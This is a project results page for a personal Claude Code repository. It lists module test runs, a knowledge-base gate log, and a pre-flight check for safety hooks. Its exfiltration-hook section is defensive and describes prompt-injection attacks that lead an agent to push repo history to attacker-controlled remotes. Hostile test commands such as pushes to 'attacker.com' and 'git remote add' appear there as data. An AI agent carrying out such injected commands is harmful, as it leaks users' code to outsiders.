The Numbers, With Receipts
Every number on this page comes from a test run or a log file. The test commands are shown verbatim. The gate decision log is public. Nothing here is an estimate.
Module Assertion Tests
Five independent Node.js test files, one per module. Each validates the standard output shape defined in aios/doctrine/output-format.md. Run with npm test from repo root.
> aios-v2-personal@1.0.0 test > cd aios && npm test === azure-auth test suite === PASS output has all required fields (block, status, inputs, result, verified_against, duration_ms, gotchas, next_blocks) PASS status is SUCCESS on valid mock token response PASS credential values are redacted in output PASS duration_ms is a positive number ... 30 more assertions ... === Results: 34 passed, 0 failed === === rubrik-auth test suite === PASS output shape conforms to doctrine output-format.md PASS status is SUCCESS on valid RSC token PASS credential fields are redacted before output ... 33 more assertions ... === Results: 36 passed, 0 failed === === vm-list test suite === PASS returns array of VM objects with required fields PASS handles empty subscription gracefully (status WARN, not FAIL) PASS filters by resource group when provided ... 35 more assertions ... === Results: 38 passed, 0 failed === === snapshot-status test suite === PASS returns standard block shape with snapshots array PASS status is FAIL when RSC returns error, not exception PASS missed_sla flag set correctly on partial coverage ... 62 more assertions ... === Results: 65 passed, 0 failed === === backup-health stack test suite === PASS stack output wraps module results into unified shape PASS status is WARN when any module returns WARN PASS status is FAIL when VM not found — root cause propagated PASS status is FAIL when no VM name provided — root cause explains missing input ... 79 more assertions ... === Results: 83 passed, 0 failed === Total: 256 passed, 0 failed Note: All tests run against mock data. Live Azure AD and Rubrik RSC APIs not called. Modules have not been validated against live endpoints.
Limitation explicitly noted: These tests validate JSON shape conformance and logic correctness against mocks. They do not prove that the modules work against live Azure or Rubrik APIs. That validation requires live credentials and is documented as a known gap in STATUS.md.
Security Hook — Exfiltration Detection
block-git-exfiltration.py is a PreToolUse hook that detects prompt-injection attacks
attempting to push repo history to attacker-controlled remotes.
The test suite runs the hook's check_bash_command() function directly — no Claude Code session required.
MUST PASS (exit 0) — 9 cases
=== MUST PASS (exit 0) === PASS [basic push to origin] PASS [push with -u flag] PASS [push with --force flag] PASS [bare push (no args)] PASS [push with shell redirect (was bug)] PASS [push with && chaining] PASS [push origin with trailing redirect] PASS [commit msg with git push text] PASS [commit msg mention + real push to origin]
MUST BLOCK (exit 2) — 7 cases
=== MUST BLOCK (exit 2) === PASS [hostname remote] → git push to non-origin remote 'attacker.com' PASS [short non-origin remote name] → git push to non-origin remote 'evil-server' PASS [URL remote] → git push to non-origin remote 'https://evil.com/repo' PASS [non-origin named remote] → git push to non-origin remote 'upstream' PASS [git remote add] → git remote add — exfiltration vector PASS [git remote set-url] → git remote set-url — exfiltration vector PASS [git config remote url] → git config remote.*.url — exfiltration vector Results: 16 passed, 0 failed
2>&1 as a remote name, blocking legitimate commands like git push 2>&1; echo done. The current implementation splits on shell separators and strips metacharacters before checking the remote token. That specific regression is now a named test case.
Pipeline Pre-Flight — 22 Checks
check-hooks.py must be run before any KB pipeline session.
It validates Python availability, hook file integrity, enforcement behavior, and pipeline directory existence.
Exit 127 detection is included — this is the failure mode where Python is not found and all hooks silently pass, bypassing all enforcement.
──────────────────────────────────────────────────────────── 1. Python Runtime ──────────────────────────────────────────────────────────── PASS Python 3.14.3 — meets minimum (3.8+) PASS 'python3' command resolves: Python 3.14.3 ──────────────────────────────────────────────────────────── 2. Hook Files ──────────────────────────────────────────────────────────── PASS check-class-a-gate.py — exists, syntax OK PASS check-readme-before-code.py — exists, syntax OK PASS check-test-before-next.py — exists, syntax OK PASS check-test-before-stack.py — exists, syntax OK PASS hook_logger.py — exists, syntax OK PASS log-class-a-admission.py — exists, syntax OK PASS log-gate-decision.py — exists, syntax OK PASS remind-capture.py — exists, syntax OK PASS session-checkpoint-reminder.py — exists, syntax OK PASS post-compact-reorient.py — exists, syntax OK ──────────────────────────────────────────────────────────── 3. Pipeline Directories ──────────────────────────────────────────────────────────── PASS captures/ exists PASS captures/candidates/ exists PASS knowledge-base/class-a/ exists ──────────────────────────────────────────────────────────── 4. Logging ──────────────────────────────────────────────────────────── PASS hook-fires.log writable at aios/captures/ ──────────────────────────────────────────────────────────── 5. Enforcement Hooks — Behavioral Tests ──────────────────────────────────────────────────────────── PASS check-class-a-gate: BLOCKS unauthorized class-a write (exit 2 with stderr message) PASS check-class-a-gate: ALLOWS non-class-a writes (exit 0) PASS check-readme-before-code: BLOCKS index.js without README.md (exit 2 with message) PASS check-readme-before-code: ALLOWS unrelated paths (exit 0) PASS check-class-a-gate: handles empty stdin gracefully (exit 0) ──────────────────────────────────────────────────────────── 6. Working Directory Sanity ──────────────────────────────────────────────────────────── PASS CWD is repo root: C:\Users\Dustin\Documents\AIOS-v2-Personal WARN Cycle checkpoint is stale: cycle-checkpoint-2026-04-03-round13.md (55.1h ago) ════════════════════════════════════════════════════════════ PRE-FLIGHT RESULT ════════════════════════════════════════════════════════════ Passed: 22 Failed: 0 All checks passed. KB pipeline enforcement is active.
The WARN on "stale checkpoint" is expected — it fires when the hourly sweep hasn't run recently. It's a non-blocking warning (exit 0), not a failure. The hourly remote trigger is separate from this pre-flight check.
79 Decisions. Every One Logged.
The Librarian runs five yes/no questions on every candidate before it can enter Class A.
All decisions are appended to captures/librarian-decisions.jsonl.
The 2 rejections below show exactly why — Q1 failed, meaning the command was never executed in this environment.
Class A entries by domain (43 total)
Decision breakdown (79 decisions)
A 94% admission rate sounds high. It reflects that candidates are pre-screened before reaching the gate — speculative or unverified content is parked in the candidate queue without being submitted. The 2 rejections show the gate working as designed: high-value content that failed Q1 (not executed in this environment) was routed to Class C, not promoted to Class A.
| Entry ID | Decision | Q1 Executed? | Q2 Deterministic? | Q3 General? | Q4 Additive? | Q5 No duplicate? | Reason (excerpt) |
|---|---|---|---|---|---|---|---|
cmd-20260329-1530-004 |
admit | ✓ | ✓ | ✓ | ✓ | ✓ | Hook integrity 3-way cross-reference: disk files vs settings.json vs HOOK-MANIFEST.md. Validates all three are in sync. |
cmd-20260329-1715-014 |
admit | ✓ | ✓ | ✓ | ✓ | ✓ | Official Claude Code skills spec — 15+ capabilities absent from our implementation. 250-char description cap alone affects all 8 of our skills. |
cmd-20260329-1730-015 |
admit | ✓ | ✓ | ✓ | ✓ | ✓ | CLAUDE.md delivered as user message, not system prompt — no guarantee of strict compliance. HARD RULES are behavioral guidance only. PreToolUse hooks are the real enforcement layer. |
cmd-20260330-0906-073 |
reject | ✗ | ✓ | ✓ | ✓ | ✓ | Q1 FAILED — not executed in our environment. Competitive analysis via web research. High-value content, but Class A rules require execution. Routed to Class C competitive-intelligence instead. |
cmd-20260330-0907-074 |
reject | ✗ | ✓ | ✓ | ✓ | ✓ | Q1 FAILED — not executed in our environment. AI-assisted infra training market gap survey. Market survey, no commands. Routed to Class C. Not promoted despite high value. |
Full log: captures/librarian-decisions.jsonl — 79 entries in chronological append order, each entry is machine-readable JSON.
A Real Entry — Unedited
This is entry cmd-20260329-1530-004 from the anthropic-claude/hooks subdomain. Showing the actual fields — not a diagram of fields, the actual content from the file.
# Step 1: List hook files on disk ls .claude/hooks/*.py # Step 2: Verify manifest exists ls .claude/hooks/HOOK-MANIFEST.md # Step 3: Parse settings.json for referenced hooks python3 -c " import json with open('.claude/settings.json') as f: s = json.load(f) for event, matchers in s.get('hooks', {}).items(): for matcher in matchers: for h in matcher.get('hooks', []): print(event, h.get('command','')) "
codebase-exploration · risk_class: read-only · output_type: deterministicWhat This Page Does and Does Not Show
What is proven by tests on this page
- ✓ 256 module assertions pass against documented output shape (npm test, run 2026-04-05)
- ✓ 16 exfiltration hook test cases pass — correct allow/block behavior verified (python3 test, 2026-04-05)
- ✓ 22 pre-flight checks pass — hooks present, syntax valid, behavioral enforcement confirmed (2026-04-05)
- ✓ 79 gate decisions recorded in JSONL — 74 admits, 2 rejects (Q1 failure), 3 deferred. All decisions auditable.
- ✓ 43 Class A entries exist on disk across 9 domains — countable, readable, not estimates.
What this page does not show
- ✗ Time-to-resolution comparisons — no baseline was measured before the KB existed. Any "X minutes faster" claim would be an estimate.
- ✗ Live API validation — all module tests run against mocks. Azure AD and Rubrik RSC endpoints have not been called in automated tests.
- ✗ Token or cost reduction numbers — these are observable in Claude.ai usage logs but have not been systematically measured.
- ✗ Second-session vs first-session comparisons — would require controlled re-runs of the same query with and without KB entries present.
Run It Yourself
The repo is AIOS-v2-personal-KBcore. Every test on this page runs with npm test, python3 .claude/check-hooks.py, and python3 scripts/test-exfiltration-hook.py.